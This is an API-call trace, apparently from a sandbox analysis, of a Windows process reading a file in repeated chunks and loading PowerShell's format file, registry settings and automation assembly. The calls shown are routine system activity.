	[0143.481] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.481] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.482] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.482] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.482] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.482] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.485] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.485] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.486] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.486] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.486] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.487] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.487] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.487] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.488] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.488] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.488] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.489] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.489] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.489] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.490] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.490] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.494] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.494] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.495] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.495] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.495] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.496] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.496] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.496] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.497] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.497] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.497] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.497] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.498] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.498] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.498] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.498] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.499] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.499] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.499] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.499] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.500] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.500] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.500] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.500] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.501] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.501] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.501] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.501] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.502] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.502] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.502] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0xf37, lpOverlapped=0x0) returned 1
	[0143.503] ReadFile (in: hFile=0x31c, lpBuffer=0x35c1adf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c1adf*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0143.503] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0143.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.503] SetErrorMode (uMode=0x1) returned 0x1
	[0143.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0143.503] SetErrorMode (uMode=0x1) returned 0x1
	[0143.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.504] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x31c) returned 0x0
	[0143.504] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0143.504] CoTaskMemAlloc (cb=0x5a) returned 0x2ed640
	[0143.504] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x2ed640, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0143.504] CoTaskMemFree (pv=0x2ed640) 
	[0143.504] RegCloseKey (hKey=0x31c) returned 0x0
	[0143.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.520] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc6b94a3f, Data2=0x5e95, Data3=0x4bdc, Data4=([0]=0xb3, [1]=0x8e, [2]=0x0, [3]=0x6c, [4]=0x3b, [5]=0xd2, [6]=0x21, [7]=0x4e))) returned 0x0
	[0143.616] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xee3ad908, Data2=0x9203, Data3=0x4be1, Data4=([0]=0xa8, [1]=0x7f, [2]=0xa1, [3]=0xa8, [4]=0xbb, [5]=0xf, [6]=0xae, [7]=0xda))) returned 0x0
	[0143.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.796] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xcf9a5abf, Data2=0x800c, Data3=0x45c8, Data4=([0]=0xa2, [1]=0x2a, [2]=0x9, [3]=0xac, [4]=0xd5, [5]=0xd7, [6]=0xfa, [7]=0x7a))) returned 0x0
	[0143.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
